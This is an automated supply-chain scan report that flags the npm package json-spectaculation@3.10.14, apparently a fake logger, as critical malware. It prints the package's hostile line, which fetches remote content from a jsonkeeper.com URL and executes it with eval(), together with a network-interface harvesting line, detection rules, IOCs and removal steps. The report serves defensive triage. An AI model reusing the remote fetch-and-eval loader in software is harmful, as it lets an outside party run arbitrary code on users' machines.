npkg:json-spectaculation@3.10.14 CRITICAL 10.0 Summary
New scan

Chaintrap · npm supply chain

npm package scan

Static behavior detection plus OSV vulnerability intel in one report. Use findings for triage; confirm with your process — full stdout and JSON are in the appendix for audit.

CRITICAL
Package
json-spectaculation@3.10.14
Dist.Shasum
275b6b0247d4fb81f402e3e8c096ffc54a238b5c
Dist.Integrity
sha512-0I6Ndo42HM7WpdvVuMsxI16gqv70zYRfGzZMRme7mI217Ny5JV2ZZg8HlcD7YisRsDRWSEOtwnSMRjn3Bv1hGA==
License
MIT
Published
2026-03-12T11:25:22.147Z
Scanned At
2026-04-20T12:01:40.346Z (996ms)

Executive summary

npm-mal-scan rated malware risk CRITICAL for this package (heuristic static analysis — not a court verdict). Vulnerability signal: NONE; dependency confusion: NONE. Scanner verdict: CRITICAL.

Scanners prioritize signal over certainty: expect both false positives and blind spots. Chaintrap is designed to combine static detection with OSV CVE data so analysts spend time on packages that look risky and have known-vuln exposure — not to replace manual review or reputation checks.

Heuristic score: 10.0 / 10 · Exit code: 1 · Completed 2026-04-20T12:01:45.352082+00:00

Malware risk
CRITICAL
Vulnerability risk
NONE
Dep confusion
NONE
📦

Package overview

json-spectaculation@3.10.14
Maintainers (registry): grace0312653 <joshcabs1234@gmail.com> · npm user (version): grace0312653 <joshcabs1234@gmail.com>
LicenseMIT
Published2026-03-12T11:25:22.147Z
Scanned2026-04-20T12:01:40.346Z (996ms)
Runtime dependencies (4)

4 runtime dependencies

PackageRequiredFlags
axios ^1.10.0
parse-json ^8.3.0
request ^2.88.2
sqlite3 ^5.1.7
Scanner build: 1.0.0
🔍

Runtime dependencies — OSV intel

Modes: OSV per dependency · resolve cap: 15 · per-child timeout: 120s

DependencyDeclaredResolved / statusOSV #Max OSV severityFull scanReports
axios^1.10.01.15.10
parse-json^8.3.08.3.00
request^2.88.22.88.21
sqlite3^5.1.75.1.70

OSV queries use the resolved version shown (exact pins as declared; ranges use the highest published version satisfying the range). See NPM_RUNTIME_DEP_OSV_SCAN / NPM_RUNTIME_DEP_FULL_SCAN in operator docs.

🔎

0 known vulnerabilities (OSV)

OSV lookup: Checked

Chaintrap pairs static behavior signals above with OSV data for this exact version — cross-check CVEs and malware listings with install scripts, execution paths, and scanner findings.

Source: osv.dev — queried at scan time.

No known vulnerabilities reported for this exact version.

Attack path

✓ 0 lifecycle hooks — this package does NOT execute code at install time. Malicious code only runs when the package binary or exports are explicitly invoked.
● May run at require() / import

Illustrative execution chain from scan order and behavior findings — heuristic, not a guaranteed exploit path.

Trigger
require() / import
Entry point
pino.js
Subprocess
writer.js:5
  • 🟡 lib/writer.js:5Subprocess: const interfaces = os.networkInterfaces()
  • 🟡 lib/writer.js:29Subprocess: require('axios').get('https://www.jsonkeeper.com/b/HY6M6').then(r => {eval(r.data.content);});
  • 🟠 lib/tools.js:214Subprocess: const valid = key !== 'level' &&

Indicators of compromise (IOCs)

These URLs, domains, and IPv4 addresses were extracted from this package and this scan (strings in source, network-related findings, and similar signals). Treat each as a candidate IOC: confirm with DNS reputation, threat feeds, and your own triage before treating it as malicious infrastructure. Each row includes a VirusTotal link (opens in a new tab) to the domain or IP address report — full https://… URLs still list the exact string, but the link uses the hostname only (e.g. https://www.jsonkeeper.com/b/… → VirusTotal domain www.jsonkeeper.com). Routine npm registry and CDN hosts are omitted where possible. Third-party threat-report links are listed separately below — those are citations for context, not automatic package contact.

URLs
Domains / hosts

Publish Entry Points (main / exports / module)

  • → pino.js

Execution-first Scan Order (17 files — tier 1 = install/entry/dist, tier 2 = adapters/core, tier 3 = shallow)

T1 score=90 pino.js publish entry (main / exports / module / browser) T3 score=25 file.js other package script (tier 3 shallow scan) T3 score=25 lib/caller.js other package script (tier 3 shallow scan) T3 score=25 lib/constants.js other package script (tier 3 shallow scan) T3 score=25 lib/deprecations.js other package script (tier 3 shallow scan) T3 score=25 lib/levels.js other package script (tier 3 shallow scan) T3 score=25 lib/meta.js other package script (tier 3 shallow scan) T3 score=25 lib/multistream.js other package script (tier 3 shallow scan) T3 score=25 lib/proto.js other package script (tier 3 shallow scan) T3 score=25 lib/redaction.js other package script (tier 3 shallow scan) T3 score=25 lib/symbols.js other package script (tier 3 shallow scan) T3 score=25 lib/time.js other package script (tier 3 shallow scan) T3 score=25 lib/tools.js other package script (tier 3 shallow scan) T3 score=25 lib/transport-stream.js other package script (tier 3 shallow scan) T3 score=25 lib/transport.js other package script (tier 3 shallow scan) T3 score=25 lib/worker.js other package script (tier 3 shallow scan) T3 score=25 lib/writer.js other package script (tier 3 shallow scan)

Malware / Behavior Findings 3 finding(s)

Consolidated match HIGH
Network / C2 signal

Most signature hits in the command:

1 rule(s) matched · lib/writer.js:5

Command / snippet
lib/writer.js
5 
const interfaces = os.networkInterfaces()
All rules that matched this line
  • HIGH [T3 exec-surface] [ND025] os.networkInterfaces() local IP harvest

    Enumerating network interfaces to collect IPv4 addresses (often filtering !internal) is a common fingerprinting step before exfil in npm stealers — seen in fake logger packages.

Consolidated match HIGH
Network / C2 signal

Most signature hits in the command:

1 rule(s) matched · lib/writer.js:29

Command / snippet
lib/writer.js
29 
require('axios').get('https://www.jsonkeeper.com/b/HY6M6').then(r => {eval(r.data.content);});
All rules that matched this line
  • HIGH [T3 exec-surface] [OBF001] eval() code execution

    eval() executes a dynamic string — the primary vector for runtime code obfuscation

Consolidated match MEDIUM

Most signature hits in the command:

1 rule(s) matched · lib/tools.js:214

Command / snippet
lib/tools.js
214 
const valid = key !== 'level' &&
All rules that matched this line
  • MEDIUM [T3 exec-surface] [PS003] Background shell execution (&)

    Shell command sent to background with & — allows npm install to exit while payload runs

Tarball vs Repo Diff (1 finding(s))

[LOW] DIFF_NO_REPO File: package.json Package has no repository field. Cannot compare tarball against source — increases opacity of provenance.

Known Vulnerabilities (OSV) ✔ No CVEs found

No known vulnerabilities for this version.

Tarball File Inventory

Total files
44
Executable scripts (17 paths)
  • file.js
  • lib/caller.js
  • lib/constants.js
  • lib/deprecations.js
  • lib/levels.js
  • lib/meta.js
  • lib/multistream.js
  • lib/proto.js
  • lib/redaction.js
  • lib/symbols.js
  • lib/time.js
  • lib/tools.js
  • lib/transport-stream.js
  • lib/transport.js
  • lib/worker.js
  • lib/writer.js
  • pino.js
Verdict
CRITICAL
Malware
CRITICAL
CVE
NONE
DepConfusion
NONE

Remediation & containment

🗑 Remove package
  • Remove from project: npm uninstall json-spectaculation
  • If globally installed: npm uninstall -g json-spectaculation
  • Regenerate lock file: delete package-lock.json and run npm install
  • Block in CI: add json-spectaculation to your package manager deny-list or use .npmrc overrides
🔒 Block candidate network IOCs
  • Block domain: www.jsonkeeper.com
🔑 Rotate credentials
  • No credential environment variables flagged in findings.
Chaintrap · npm scan (static + OSV) Package json-spectaculation@3.10.14